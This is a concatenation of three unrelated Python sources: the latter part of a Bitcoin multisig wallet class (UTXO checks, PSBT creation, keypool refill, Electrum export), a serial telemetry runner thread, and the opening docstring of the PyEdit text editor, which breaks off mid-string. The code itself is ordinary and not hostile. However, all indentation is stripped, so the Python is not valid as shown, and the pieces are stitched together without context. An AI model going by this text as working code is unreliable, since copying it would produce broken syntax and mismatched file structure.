pending_psbts = wallet_dict.get("pending_psbts", {})
fullpath = wallet_dict.get("fullpath", default_fullpath)
last_block = wallet_dict.get("last_block", None)
wallet_dict = Wallet.parse_old_format(wallet_dict, device_manager)
try:
address_type = wallet_dict["address_type"]
recv_descriptor = wallet_dict["recv_descriptor"]
change_descriptor = wallet_dict["change_descriptor"]
keys = [Key.from_json(key_dict) for key_dict in wallet_dict["keys"]]
devices = wallet_dict["devices"]
except:
logger.error("Could not construct a Wallet object from the data provided.")
return
return cls(
name,
alias,
description,
address_type,
address,
address_index,
change_address,
change_index,
keypool,
change_keypool,
recv_descriptor,
change_descriptor,
keys,
devices,
sigs_required,
pending_psbts,
fullpath,
device_manager,
manager,
old_format_detected=wallet_dict["old_format_detected"],
last_block=last_block,
)
def get_info(self):
try:
self.info = self.rpc.getwalletinfo()
except Exception:
self.info = {}
return self.info
def check_utxo(self):
try:
utxo = self.rpc.listunspent(0)
# list only the ones we know (have descriptor for it)
utxo = [tx for tx in utxo if tx.get("desc", "")]
for tx in utxo:
tx_data = self.gettransaction(tx["txid"], 0)
tx["time"] = tx_data["time"]
tx["category"] = "send"
try:
# get category from the descriptor - recv or change
idx = tx["desc"].split("[")[1].split("]")[0].split("/")[-2]
if idx == "0":
tx["category"] = "receive"
except:
pass
self.utxo = sorted(utxo, key=lambda utxo: utxo["time"], reverse=True)
except Exception as e:
logger.error(f"Failed to load utxos, {e}")
self.utxo = []
def getdata(self):
self.fetch_transactions()
self.check_utxo()
self.get_info()
# TODO: Should do the same for the non change address (?)
# check if address was used already
try:
value_on_address = self.rpc.getreceivedbyaddress(self.change_address, 0)
except:
# Could happen if address not in wallet (wallet was imported)
# try adding keypool
logger.info(
f"Didn't get transactions on address {self.change_address}. Refilling keypool."
)
self.keypoolrefill(0, end=self.keypool, change=False)
self.keypoolrefill(0, end=self.change_keypool, change=True)
value_on_address = 0
# if not - just return
if value_on_address > 0:
self.change_index += 1
self.getnewaddress(change=True)
@property
def json(self):
return self.to_json()
def to_json(self, for_export=False):
o = {
"name": self.name,
"alias": self.alias,
"description": self.description,
"address_type": self.address_type,
"address": self.address,
"address_index": self.address_index,
"change_address": self.change_address,
"change_index": self.change_index,
"keypool": self.keypool,
"change_keypool": self.change_keypool,
"recv_descriptor": self.recv_descriptor,
"change_descriptor": self.change_descriptor,
"keys": [key.json for key in self.keys],
"devices": [device.alias for device in self.devices],
"sigs_required": self.sigs_required,
"blockheight": self.blockheight,
}
if for_export:
o["labels"] = self.export_labels()
else:
o["pending_psbts"] = self.pending_psbts
o["last_block"] = self.last_block
return o
def save_to_file(self):
write_json_file(self.to_json(), self.fullpath)
self.manager.update()
def delete_files(self):
delete_file(self.fullpath)
delete_file(self.fullpath + ".bkp")
delete_file(self._addresses.path)
delete_file(self._transactions.path)
@property
def is_multisig(self):
return len(self.keys) > 1
@property
def locked_amount(self):
amount = 0
for psbt in self.pending_psbts:
amount += sum(
[
utxo["witness_utxo"]["amount"]
for utxo in self.pending_psbts[psbt]["inputs"]
]
)
return amount
def delete_pending_psbt(self, txid):
try:
self.rpc.lockunspent(True, self.pending_psbts[txid]["tx"]["vin"])
except:
# UTXO was spent
pass
if txid in self.pending_psbts:
del self.pending_psbts[txid]
self.save_to_file()
def update_pending_psbt(self, psbt, txid, raw):
if txid in self.pending_psbts:
self.pending_psbts[txid]["base64"] = psbt
decodedpsbt = self.rpc.decodepsbt(psbt)
signed_devices = self.get_signed_devices(decodedpsbt)
self.pending_psbts[txid]["devices_signed"] = [
dev.alias for dev in signed_devices
]
if "hex" in raw:
self.pending_psbts[txid]["sigs_count"] = self.sigs_required
self.pending_psbts[txid]["raw"] = raw["hex"]
else:
self.pending_psbts[txid]["sigs_count"] = len(signed_devices)
self.save_to_file()
return self.pending_psbts[txid]
else:
raise SpecterError("Can't find pending PSBT with this txid")
def save_pending_psbt(self, psbt):
self.pending_psbts[psbt["tx"]["txid"]] = psbt
try:
self.rpc.lockunspent(False, psbt["tx"]["vin"])
except:
logger.debug(
"Failed to lock UTXO for transaction, might be fine if the transaction is an RBF."
)
self.save_to_file()
def txlist(
self,
fetch_transactions=True,
validate_merkle_proofs=False,
current_blockheight=None,
):
"""Returns a list of all transactions in the wallet's CSV cache - processed with information to display in the UI in the transactions list
#Parameters:
# fetch_transactions (bool): Update the TxList CSV caching by fetching transactions from the Bitcoin RPC
# validate_merkle_proofs (bool): Return transactions with validated_blockhash
# current_blockheight (int): Current blockheight for calculating confirmations number (None will fetch the block count from the RPC)
"""
if fetch_transactions:
self.fetch_transactions()
try:
_transactions = [tx.__dict__().copy() for tx in self._transactions.values()]
transactions = sorted(
_transactions, key=lambda tx: tx["time"], reverse=True
)
transactions = [
tx
for tx in transactions
if (
not tx["conflicts"]
or max(
[
self.gettransaction(conflicting_tx, 0)["time"]
for conflicting_tx in tx["conflicts"]
]
)
< tx["time"]
)
]
if not current_blockheight:
current_blockheight = self.rpc.getblockcount()
result = []
blocks = {}
for tx in transactions:
if not tx.get("blockheight", 0):
tx["confirmations"] = 0
else:
tx["confirmations"] = current_blockheight - tx["blockheight"] + 1
raw_tx = decoderawtransaction(tx["hex"], self.manager.chain)
tx["vsize"] = raw_tx["vsize"]
if (
tx.get("confirmations") == 0
and tx.get("bip125-replaceable", "no") == "yes"
):
tx["fee"] = self.rpc.gettransaction(tx["txid"]).get("fee", 1)
category = ""
addresses = []
amounts = {}
inputs_mine_count = 0
for vin in raw_tx["vin"]:
# coinbase tx
if (
vin["txid"]
== "0000000000000000000000000000000000000000000000000000000000000000"
):
if tx["confirmations"] <= 100:
category = "immature"
else:
category = "generate"
break
if vin["txid"] in self._transactions:
try:
address = decoderawtransaction(
self._transactions[vin["txid"]]["hex"],
self.manager.chain,
)["vout"][vin["vout"]]["addresses"][0]
address_info = self.get_address_info(address)
if address_info and not address_info.is_external:
inputs_mine_count += 1
except Exception:
continue
outputs_mine_count = 0
for out in raw_tx["vout"]:
try:
address = out["addresses"][0]
except Exception:
# couldn't get address...
continue
address_info = self.get_address_info(address)
if address_info and not address_info.is_external:
outputs_mine_count += 1
addresses.append(address)
amounts[address] = out["value"]
if inputs_mine_count:
if outputs_mine_count and (
len(
[
address
for address in addresses
if self.get_address_info(address)
and not self.get_address_info(address).change
]
)
> 0
):
category = "selftransfer"
addresses = [
address
for address in addresses
if self.get_address_info(address)
and not self.get_address_info(address).change
]
elif outputs_mine_count and (
len(
[
address
for address in addresses
if self.get_address_info(address)
and self.get_address_info(address).change
]
)
> 1
or len(raw_tx["vout"]) == 1
):
category = "selftransfer"
addresses = [
address
for address in addresses
if self.get_address_info(address)
]
else:
category = "send"
addresses = [
address
for address in addresses
if not self.get_address_info(address)
or self.get_address_info(address).is_external
]
else:
if not category:
category = "receive"
addresses = [
address
for address in addresses
if self.get_address_info(address)
and not self.get_address_info(address).is_external
]
amounts = [amounts[address] for address in addresses]
if len(addresses) == 1:
addresses = addresses[0]
amounts = amounts[0]
tx["label"] = self.getlabel(addresses)
else:
tx["label"] = [self.getlabel(address) for address in addresses]
tx["category"] = category
tx["address"] = addresses
tx["amount"] = amounts
if len(addresses) == 0:
tx["ismine"] = False
else:
tx["ismine"] = True
# TODO: validate for unique txids only
tx["validated_blockhash"] = "" # default is assume unvalidated
if validate_merkle_proofs is True and tx["confirmations"] > 0:
proof_hex = self.rpc.gettxoutproof([tx["txid"]], tx["blockhash"])
logger.debug(
f"Attempting merkle proof validation of tx { tx['txid'] } in block { tx['blockhash'] }"
)
if is_valid_merkle_proof(
proof_hex=proof_hex,
target_tx_hex=tx["txid"],
target_block_hash_hex=tx["blockhash"],
target_merkle_root_hex=None,
):
# NOTE: this does NOT guarantee this blockhash is actually in the real Bitcoin blockchain!
# See merkletooltip.html for details
logger.debug(
f"Merkle proof of { tx['txid'] } validation success"
)
tx["validated_blockhash"] = tx["blockhash"]
else:
logger.warning(
f"Attempted merkle proof validation on {tx['txid']} but failed. This is likely a configuration error but perhaps your node is compromised! Details: {proof_hex}"
)
result.append(tx)
return result
except Exception as e:
logging.error("Exception while processing txlist: {}".format(e))
return []
def gettransaction(self, txid, blockheight=None):
try:
return self._transactions.gettransaction(txid, blockheight)
except Exception as e:
logger.warning("Could not get transaction {}, error: {}".format(txid, e))
def rescanutxo(self, explorer=None):
t = threading.Thread(target=self._rescan_utxo_thread, args=(explorer,))
t.start()
def export_labels(self):
return self._addresses.get_labels()
def import_labels(self, labels):
# format:
# {
# 'label1': ['address1', 'address2'],
# 'label2': ['address3', 'address4']
# }
#
for label, addresses in labels.items():
if not label:
continue
for address in addresses:
self._addresses.set_label(address, label)
def _rescan_utxo_thread(self, explorer=None):
# rescan utxo is pretty fast,
# so we can check large range of addresses
# and adjust keypool accordingly
args = [
"start",
[
{"desc": self.recv_descriptor, "range": max(self.keypool, 1000)},
{
"desc": self.change_descriptor,
"range": max(self.change_keypool, 1000),
},
],
]
unspents = self.rpc.scantxoutset(*args)["unspents"]
# if keypool adjustments fails - not a big deal
try:
# check derivation indexes in found unspents (last 2 indexes in [brackets])
derivations = [
tx["desc"].split("[")[1].split("]")[0].split("/")[-2:]
for tx in unspents
]
# get max derivation for change and receive branches
max_recv = max([-1] + [int(der[1]) for der in derivations if der[0] == "0"])
max_change = max(
[-1] + [int(der[1]) for der in derivations if der[0] == "1"]
)
updated = False
if max_recv >= self.address_index:
# skip to max_recv
self.address_index = max_recv
# get next
self.getnewaddress(change=False, save=False)
updated = True
while max_change >= self.change_index:
# skip to max_change
self.change_index = max_change
# get next
self.getnewaddress(change=True, save=False)
updated = True
# save only if needed
if updated:
self.save_to_file()
except Exception as e:
logger.warning(f"Failed to get derivation path from utxo transaction: {e}")
# keep working with unspents
res = self.rpc.multi([("getblockhash", tx["height"]) for tx in unspents])
block_hashes = [r["result"] for r in res]
for i, tx in enumerate(unspents):
tx["blockhash"] = block_hashes[i]
res = self.rpc.multi(
[("gettxoutproof", [tx["txid"]], tx["blockhash"]) for tx in unspents]
)
proofs = [r["result"] for r in res]
for i, tx in enumerate(unspents):
tx["proof"] = proofs[i]
res = self.rpc.multi(
[
("getrawtransaction", tx["txid"], False, tx["blockhash"])
for tx in unspents
]
)
raws = [r["result"] for r in res]
for i, tx in enumerate(unspents):
tx["raw"] = raws[i]
missing = [tx for tx in unspents if tx["raw"] is None]
existing = [tx for tx in unspents if tx["raw"] is not None]
self.rpc.multi(
[("importprunedfunds", tx["raw"], tx["proof"]) for tx in existing]
)
# handle missing transactions now
# if Tor is running, requests will be sent over Tor
if explorer is not None:
try:
requests_session = requests.Session()
requests_session.proxies["http"] = "socks5h://localhost:9050"
requests_session.proxies["https"] = "socks5h://localhost:9050"
requests_session.get(explorer)
except Exception:
requests_session = requests.Session()
# make sure there is no trailing /
explorer = explorer.rstrip("/")
try:
# get raw transactions
raws = [
requests_session.get(f"{explorer}/api/tx/{tx['txid']}/hex").text
for tx in missing
]
# get proofs
proofs = [
requests_session.get(
f"{explorer}/api/tx/{tx['txid']}/merkleblock-proof"
).text
for tx in missing
]
# import funds
self.rpc.multi(
[
("importprunedfunds", raws[i], proofs[i])
for i in range(len(raws))
]
)
except Exception as e:
logger.warning(f"Failed to fetch data from block explorer: {e}")
self.check_addresses()
@property
def rescan_progress(self):
"""Returns None if rescanblockchain is not launched,
value between 0 and 1 otherwise
"""
if self.info.get("scanning", False) == False:
return None
else:
return self.info["scanning"]["progress"]
@property
def blockheight(self):
txs = self.rpc.listtransactions("*", 100, 0, True)
i = 0
while len(txs) == 100:
i += 1
next_txs = self.rpc.listtransactions("*", 100, i * 100, True)
if len(next_txs) > 0:
txs = next_txs
else:
break
try:
if len(txs) > 0 and "blockheight" in txs[0]:
blockheight = (
txs[0]["blockheight"] - 101
) # To ensure coinbase transactions are indexed properly
return (
0 if blockheight < 0 else blockheight
) # To ensure regtest don't have negative blockheight
except:
pass
return 481824 if self.manager.chain == "main" else 0
@property
def account_map(self):
return (
'{ "label": "'
+ self.name.replace("'", "\\'")
+ '", "blockheight": '
+ str(self.blockheight)
+ ', "descriptor": "'
+ self.recv_descriptor.replace("/", "\\/")
+ '" }'
)
def getnewaddress(self, change=False, save=True):
if change:
self.change_index += 1
index = self.change_index
else:
self.address_index += 1
index = self.address_index
address = self.get_address(index, change=change)
if change:
self.change_address = address
else:
self.address = address
if save:
self.save_to_file()
return address
def get_address(self, index, change=False, check_keypool=True):
if check_keypool:
pool = self.change_keypool if change else self.keypool
if pool < index + self.GAP_LIMIT:
self.keypoolrefill(pool, index + self.GAP_LIMIT, change=change)
desc = self.change_descriptor if change else self.recv_descriptor
return Descriptor.parse(desc).address(index, self.manager.chain)
def get_descriptor(self, index=None, change=False, address=None):
"""
Returns address descriptor from index, change
or from address belonging to the wallet.
"""
if address is not None:
# only ask rpc if address is not known directly
if address not in self._addresses:
return self.rpc.getaddressinfo(address).get("desc", "")
else:
a = self._addresses[address]
index = a.index
change = a.change
if index is None:
index = self.change_index if change else self.address_index
desc = self.change_descriptor if change else self.recv_descriptor
derived_desc = Descriptor.parse(desc).derive(index).serialize()
derived_desc_xpubs = (
Descriptor.parse(desc).derive(index, keep_xpubs=True).serialize()
)
return {"descriptor": derived_desc, "xpubs_descriptor": derived_desc_xpubs}
def get_address_info(self, address):
try:
return self._addresses[address]
except:
return None
def get_electrum_file(self):
""" Exports the wallet data as Electrum JSON format """
electrum_devices = [
"bitbox02",
"coldcard",
"digitalbitbox",
"keepkey",
"ledger",
"safe_t",
"trezor",
]
if len(self.keys) == 1:
# Single-sig case:
key = self.keys[0]
if self.devices[0].device_type in electrum_devices:
return {
"keystore": {
"ckcc_xpub": key.xpub,
"derivation": key.derivation.replace("h", "'"),
"root_fingerprint": key.fingerprint,
"hw_type": self.devices[0].device_type,
"label": self.devices[0].name,
"type": "hardware",
"soft_device_id": None,
"xpub": key.original,
},
"wallet_type": "standard",
}
else:
return {
"keystore": {
"derivation": key.derivation.replace("h", "'"),
"root_fingerprint": key.fingerprint,
"type": "bip32",
"xprv": None,
"xpub": key.original,
},
"wallet_type": "standard",
}
# Multisig case
to_return = {"wallet_type": "{}of{}".format(self.sigs_required, len(self.keys))}
for cnt, device in enumerate(self.devices):
key = [key for key in device.keys if key in self.keys][0]
if device.device_type in electrum_devices:
to_return["x{}/".format(cnt + 1)] = {
"ckcc_xpub": key.xpub,
"derivation": key.derivation.replace("h", "'"),
"root_fingerprint": key.fingerprint,
"hw_type": device.device_type,
"label": device.name,
"type": "hardware",
"soft_device_id": None,
"xpub": key.original,
}
else:
to_return["x{}/".format(cnt + 1)] = {
"derivation": key.derivation.replace("h", "'"),
"root_fingerprint": key.fingerprint,
"type": "bip32",
"xprv": None,
"xpub": key.original,
}
return to_return
def get_balance(self):
try:
balance = self.rpc.getbalances()["watchonly"]
# calculate available balance
locked_utxo = self.rpc.listlockunspent()
available = {}
available.update(balance)
for tx in locked_utxo:
tx_data = self.gettransaction(tx["txid"])
raw_tx = decoderawtransaction(tx_data["hex"], self.manager.chain)
delta = raw_tx["vout"][tx["vout"]]["value"]
if "confirmations" not in tx_data or tx_data["confirmations"] == 0:
available["untrusted_pending"] -= delta
else:
available["trusted"] -= delta
available["trusted"] = round(available["trusted"], 8)
available["untrusted_pending"] = round(available["untrusted_pending"], 8)
balance["available"] = available
except:
balance = {
"trusted": 0,
"untrusted_pending": 0,
"available": {"trusted": 0, "untrusted_pending": 0},
}
self.balance = balance
return self.balance
def keypoolrefill(self, start, end=None, change=False):
if end is None:
end = start + self.GAP_LIMIT
desc = self.recv_descriptor if not change else self.change_descriptor
args = [
{
"desc": desc,
"internal": change,
"range": [start, end],
"timestamp": "now",
"keypool": True,
"watchonly": True,
}
]
addresses = [
dict(
address=self.get_address(idx, change=change, check_keypool=False),
index=idx,
change=change,
)
for idx in range(start, end)
]
self._addresses.add(addresses, check_rpc=False)
if not self.is_multisig:
r = self.rpc.importmulti(args, {"rescan": False})
# bip67 requires sorted public keys for multisig addresses
else:
# try if sortedmulti is supported
r = self.rpc.importmulti(args, {"rescan": False})
# doesn't raise, but instead returns "success": False
if not r[0]["success"]:
# first import normal multi
# remove checksum
desc = desc.split("#")[0]
# switch to multi
desc = desc.replace("sortedmulti", "multi")
# add checksum
desc = AddChecksum(desc)
# update descriptor
args[0]["desc"] = desc
r = self.rpc.importmulti(args, {"rescan": False})
# make a batch of single addresses to import
arg = args[0]
# remove range key
arg.pop("range")
batch = []
for i in range(start, end):
sorted_desc = sort_descriptor(desc, index=i)
# create fresh object
obj = {}
obj.update(arg)
obj.update({"desc": sorted_desc})
batch.append(obj)
r = self.rpc.importmulti(batch, {"rescan": False})
if change:
self.change_keypool = end
else:
self.keypool = end
self.save_to_file()
return end
def setlabel(self, address, label):
self._addresses.set_label(address, label)
def getlabel(self, address):
if address in self._addresses:
return self._addresses[address].label
else:
return address
def getlabels(self, addresses):
labels = {}
for addr in addresses:
labels[addr] = self.getlabel(addr)
return labels
def get_address_name(self, address, addr_idx):
# TODO: remove
return self.getlabel(address)
@property
def fullbalance(self):
balance = self.balance
return balance["trusted"] + balance["untrusted_pending"]
@property
def available_balance(self):
return self.balance["available"]
@property
def full_available_balance(self):
balance = self.available_balance
return balance["trusted"] + balance["untrusted_pending"]
@property
def addresses(self):
return [self.get_address(idx) for idx in range(0, self.address_index + 1)]
@property
def change_addresses(self):
return [
self.get_address(idx, change=True)
for idx in range(0, self.change_index + 1)
]
@property
def wallet_addresses(self):
return self.addresses + self.change_addresses
def createpsbt(
self,
addresses: [str],
amounts: [float],
subtract: bool = False,
subtract_from: int = 0,
fee_rate: float = 1.0,
selected_coins=[],
readonly=False,
rbf=True,
existing_psbt=None,
):
"""
fee_rate: in sat/B or BTC/kB. If set to 0 Bitcoin Core sets feeRate automatically.
"""
if fee_rate > 0 and fee_rate < self.MIN_FEE_RATE:
fee_rate = self.MIN_FEE_RATE
options = {"includeWatching": True, "replaceable": rbf}
extra_inputs = []
if not existing_psbt:
if self.full_available_balance < sum(amounts):
raise SpecterError(
"The wallet does not have sufficient funds to make the transaction."
)
if self.available_balance["trusted"] <= sum(amounts):
txlist = self.rpc.listunspent(0, 0)
b = sum(amounts) - self.available_balance["trusted"]
for tx in txlist:
extra_inputs.append({"txid": tx["txid"], "vout": tx["vout"]})
b -= tx["amount"]
if b < 0:
break
elif selected_coins != []:
still_needed = sum(amounts)
for coin in selected_coins:
coin_txid = coin.split(",")[0]
coin_vout = int(coin.split(",")[1])
coin_amount = float(coin.split(",")[2])
extra_inputs.append({"txid": coin_txid, "vout": coin_vout})
still_needed -= coin_amount
if still_needed < 0:
break
if still_needed > 0:
raise SpecterError(
"Selected coins does not cover Full amount! Please select more coins!"
)
# subtract fee from amount of this output:
# currently only one address is supported, so either
# empty array (subtract from change) or [0]
subtract_arr = [subtract_from] if subtract else []
options = {
"includeWatching": True,
"changeAddress": self.change_address,
"subtractFeeFromOutputs": subtract_arr,
"replaceable": rbf,
}
if fee_rate > 0:
# bitcoin core needs us to convert sat/B to BTC/kB
options["feeRate"] = round((fee_rate * 1000) / 1e8, 8)
# don't reuse change addresses - use getrawchangeaddress instead
r = self.rpc.walletcreatefundedpsbt(
extra_inputs, # inputs
[{addresses[i]: amounts[i]} for i in range(len(addresses))], # output
0, # locktime
options, # options
True, # bip32-der
)
b64psbt = r["psbt"]
psbt = self.rpc.decodepsbt(b64psbt)
else:
psbt = existing_psbt
extra_inputs = [
{"txid": tx["txid"], "vout": tx["vout"]} for tx in psbt["tx"]["vin"]
]
if "changeAddress" in psbt:
options["changeAddress"] = psbt["changeAddress"]
if "base64" in psbt:
b64psbt = psbt["base64"]
if fee_rate > 0.0:
if not existing_psbt:
psbt_fees_sats = int(psbt["fee"] * 1e8)
# estimate final size: add weight of inputs
tx_full_size = ceil(
psbt["tx"]["vsize"]
+ len(psbt["inputs"]) * self.weight_per_input / 4
)
adjusted_fee_rate = (
fee_rate
* (fee_rate / (psbt_fees_sats / psbt["tx"]["vsize"]))
* (tx_full_size / psbt["tx"]["vsize"])
)
options["feeRate"] = "%.8f" % round((adjusted_fee_rate * 1000) / 1e8, 8)
else:
options["feeRate"] = "%.8f" % round((fee_rate * 1000) / 1e8, 8)
r = self.rpc.walletcreatefundedpsbt(
extra_inputs, # inputs
[{addresses[i]: amounts[i]} for i in range(len(addresses))], # output
0, # locktime
options, # options
True, # bip32-der
)
b64psbt = r["psbt"]
psbt = self.rpc.decodepsbt(b64psbt)
psbt["fee_rate"] = options["feeRate"]
# estimate full size
tx_full_size = ceil(
psbt["tx"]["vsize"] + len(psbt["inputs"]) * self.weight_per_input / 4
)
psbt["tx_full_size"] = tx_full_size
psbt["base64"] = b64psbt
psbt["amount"] = amounts
psbt["address"] = addresses
psbt["time"] = time.time()
psbt["sigs_count"] = 0
if not readonly:
self.save_pending_psbt(psbt)
return psbt
def send_rbf_tx(self, txid, fee_rate):
raw_tx = self.gettransaction(txid)["hex"]
raw_psbt = self.rpc.utxoupdatepsbt(
self.rpc.converttopsbt(raw_tx, True),
[self.recv_descriptor, self.change_descriptor],
)
psbt = self.rpc.decodepsbt(raw_psbt)
psbt["changeAddress"] = [
vout["scriptPubKey"]["addresses"][0]
for i, vout in enumerate(psbt["tx"]["vout"])
if self.get_address_info(vout["scriptPubKey"]["addresses"][0])
and self.get_address_info(vout["scriptPubKey"]["addresses"][0]).change
]
if psbt["changeAddress"]:
psbt["changeAddress"] = psbt["changeAddress"][0]
else:
raise Exception("Cannot RBF a transaction with no change output")
return self.createpsbt(
addresses=[
vout["scriptPubKey"]["addresses"][0]
for i, vout in enumerate(psbt["tx"]["vout"])
if not self.get_address_info(vout["scriptPubKey"]["addresses"][0])
or not self.get_address_info(
vout["scriptPubKey"]["addresses"][0]
).change
],
amounts=[
vout["value"]
for i, vout in enumerate(psbt["tx"]["vout"])
if not self.get_address_info(vout["scriptPubKey"]["addresses"][0])
or not self.get_address_info(
vout["scriptPubKey"]["addresses"][0]
).change
],
fee_rate=fee_rate,
readonly=False,
rbf=True,
existing_psbt=psbt,
)
def fill_psbt(self, b64psbt, non_witness: bool = True, xpubs: bool = True):
psbt = PSBT()
psbt.deserialize(b64psbt)
if non_witness:
for i, inp in enumerate(psbt.tx.vin):
txid = inp.prevout.hash.to_bytes(32, "big").hex()
try:
res = self.gettransaction(txid)
stream = BytesIO(bytes.fromhex(res["hex"]))
prevtx = CTransaction()
prevtx.deserialize(stream)
psbt.inputs[i].non_witness_utxo = prevtx
except:
logger.error(
"Can't find previous transaction in the wallet. Signing might not be possible for certain devices..."
)
else:
# remove non_witness_utxo if we don't want them
for inp in psbt.inputs:
if inp.witness_utxo is not None:
inp.non_witness_utxo = None
if xpubs:
# for multisig add xpub fields
if len(self.keys) > 1:
for k in self.keys:
key = b"\x01" + decode_base58(k.xpub)
if k.fingerprint != "":
fingerprint = bytes.fromhex(k.fingerprint)
else:
fingerprint = get_xpub_fingerprint(k.xpub)
if k.derivation != "":
der = der_to_bytes(k.derivation)
else:
der = b""
value = fingerprint + der
psbt.unknown[key] = value
return psbt.serialize()
def get_signed_devices(self, decodedpsbt):
signed_devices = []
# check who already signed
for i, key in enumerate(self.keys):
sigs = 0
for inp in decodedpsbt["inputs"]:
if "bip32_derivs" not in inp:
# how are we going to sign it???
break
if "partial_signatures" not in inp:
# nothing to update - no signatures for this input
break
for der in inp["bip32_derivs"]:
if der["master_fingerprint"] == key.fingerprint:
if der["pubkey"] in inp["partial_signatures"]:
sigs += 1
# ok we have all signatures from this key (device)
if sigs >= len(decodedpsbt["inputs"]):
# assuming that order of self.devices and self.keys is the same
signed_devices.append(self.devices[i])
return signed_devices
def importpsbt(self, b64psbt):
# TODO: check maybe some of the inputs are already locked
psbt = self.rpc.decodepsbt(b64psbt)
psbt["base64"] = b64psbt
amount = []
address = []
# get output address and amount
for out in psbt["tx"]["vout"]:
if (
"addresses" not in out["scriptPubKey"]
or len(out["scriptPubKey"]["addresses"]) == 0
):
# TODO: we need to handle it somehow differently
raise SpecterError("Sending to raw scripts is not supported yet")
addr = out["scriptPubKey"]["addresses"][0]
info = self.get_address_info(addr)
# check if it's a change
if info and info.change:
continue
address.append(addr)
amount.append(out["value"])
psbt = self.createpsbt(
addresses=address,
amounts=amount,
fee_rate=0.0,
readonly=False,
existing_psbt=psbt,
)
signed_devices = self.get_signed_devices(psbt)
psbt["devices_signed"] = [dev.alias for dev in signed_devices]
psbt["sigs_count"] = len(signed_devices)
raw = self.rpc.finalizepsbt(b64psbt)
if "hex" in raw:
psbt["raw"] = raw["hex"]
return psbt
@property
def weight_per_input(self):
"""Calculates the weight of a signed input"""
if self.is_multisig:
input_size = 3 # OP_M OP_N ... OP_CHECKMULTISIG
# pubkeys
input_size += 34 * len(self.keys)
# signatures
input_size += 75 * self.sigs_required
if not self.recv_descriptor.startswith("wsh"):
# P2SH scriptsig: 22 00 20 <32-byte-hash>
input_size += 35 * 4
return input_size
# else: single-sig
if self.recv_descriptor.startswith("wpkh"):
# pubkey, signature
return 75 + 34
# pubkey, signature, 4* P2SH: 16 00 14 20-byte-hash
return 75 + 34 + 23 * 4
|
runner.py
|
import threading
import time
# Main class
class Runner:
def __init__(self, transport, telemetry, plots, plotsLock, topics):
self.transport = transport
self.telemetryWrapper = telemetry
self.plots = plots
self.plotsLock = plotsLock
self.topics = topics
self.thread = None
self.running = threading.Event()
self.running.set()
self.connected = threading.Event()
self.connected.clear()
self.resetStats()
def connect(self,port,bauds):
# Create monitoring topics
self.topics.create("baudspeed",source="cli")
self.topics.create("baudspeed_avg",source="cli")
self.topics.create("rx_in_waiting",source="cli")
self.topics.create("rx_in_waiting_max",source="cli")
self.topics.create("rx_in_waiting_avg",source="cli")
# Connection options
options = dict()
options['port'] = port
options['baudrate'] = bauds
self.baudrate = bauds
self.transport.connect(options)
self._start_thread()
def _start_thread(self):
self.connected.set()
self.thread = threading.Thread(target=self.run)
self.thread.start()
def disconnect(self):
self.connected.clear()
self.transport.disconnect()
def terminate(self):
self.running.clear()
if self.thread:
self.thread.join()
try:
self.transport.disconnect()
except:
pass # Already disconnected
def stats(self):
return {
"baudspeed" : self.baudspeed,
"baudspeed_avg" : self.baudspeed_avg,
"baudratio" : self.baudspeed / self.baudrate,
"baudratio_avg" : self.baudspeed_avg / self.baudrate
}
def resetStats(self):
self.baudrate = 1.0
self.baudspeed = 0.0
self.lasttime = time.time()
self.lastamount = 0.0
self.baudspeed_avg = 0.0
def update(self):
# Update protocol decoding
self.telemetryWrapper.update()
# Protect the self.plots data structure from
# being modified from the main thread
self.plotsLock.acquire()
# Poll each poll pipe to see if user closed them
plotToDelete = None
for p, i in zip(self.plots,range(len(self.plots))):
if p['ctrl'].poll():
if p['ctrl'].recv() == "closing":
plotToDelete = i
break
# Delete a plot if needed
if plotToDelete is not None:
self.plots[plotToDelete]['ctrl'].close()
topic = self.plots[plotToDelete]['topic']
self.topics.untransfer(topic)
self.plots.pop(plotToDelete)
self.plotsLock.release()
def computeStats(self):
current = time.time()
difft = current - self.lasttime
if difft > 0.05 :
self.lasttime = current
measures = self.transport.stats()
diff = measures['rx_bytes'] - self.lastamount
self.lastamount = measures['rx_bytes']
self.baudspeed = diff / difft
# Compute rolling average baud speed on about 1 second window
n = 20
self.baudspeed_avg = (self.baudspeed + n * self.baudspeed_avg) / (n + 1)
# Send cli system data to the topics so that they can be plotted.
self.topics.process("baudspeed",self.baudspeed)
self.topics.process("baudspeed_avg",self.baudspeed_avg)
self.topics.process("rx_in_waiting",measures['rx_in_waiting'])
self.topics.process("rx_in_waiting_max",measures['rx_in_waiting_max'])
self.topics.process("rx_in_waiting_avg",measures['rx_in_waiting_avg'])
def run(self):
while self.running.is_set():
if self.connected.is_set():
self.update()
self.computeStats()
else:
time.sleep(0.5)
|
_techreview-textEditor.py
|
"""
################################################################################
PyEdit 2.1: a Python/tkinter text file editor and component.
Uses the Tk text widget, plus GuiMaker menus and toolbar buttons to
implement a full-featured text editor that can be run as a standalone
program, and attached as a component to other GUIs. Also used by
PyMailGUI and PyView to edit mail text and image file notes, and by
PyMailGUI and PyDemos in pop-up mode to display source and text files.
New in version 2.1 (4E)
-updated to run under Python 3.X (3.1)
-added "grep" search menu option and dialog: threaded external files search
-verify app exit on quit if changes in other edit windows in process
-supports arbitrary Unicode encodings for files: per textConfig.py settings
-update change and font dialog implementations to allow many to be open
-runs self.update() before setting text in new editor for loadFirst
-various improvements to the Run Code option, per the next section
2.1 Run Code improvements:
-use base name after chdir to run code file, not possibly relative path
-use launch modes that support arguments for run code file mode on Windows
-run code inherits launchmodes backslash conversion (no longer required)
New in version 2.0 (3E)
-added simple font components input dialog
-use Tk 8.4 undo stack API to add undo/redo text modifications
-now verifies on quit, open, new, run, only if text modified and unsaved
-searches are case-insensitive now by default
-configuration module for initial font/color/size/searchcase
TBD (and suggested exercises):
-could also allow search case choice in GUI (not just config file)
-could use re patterns for searches (see text chapter)
-could experiment with syntax-directed text colorization (see IDLE, others)
-could try to verify app exit for quit() in non-managed windows too?
-could queue each result as found in grep dialog thread to avoid delay
-could use images in toolbar buttons (per examples of this in Chapter 9)
-could scan line to map Tk insert position column to account for tabs on Info
################################################################################
"""
Version = '2.1'
import sys, os # platform, args, run tools
from tkinter import * # base widgets, constants
from tkinter.filedialog import Open, SaveAs # standard dialogs
from tkinter.messagebox import showinfo, showerror, askyesno
from tkinter.simpledialog import askstring, askinteger
from tkinter.colorchooser import askcolor
from PP4E.Gui.Tools.guimaker import * # Frame + menu/toolbar builders
# general configurations
try:
import textConfig # startup font and colors
configs = textConfig.__dict__ # work if not on the path or bad
except: # define in client app directory
configs = {}
helptext = """PyEdit version %s
April, 2010
(2.0: January, 2006)
(1.0: October, 2000)
Programming Python, 4th Edition
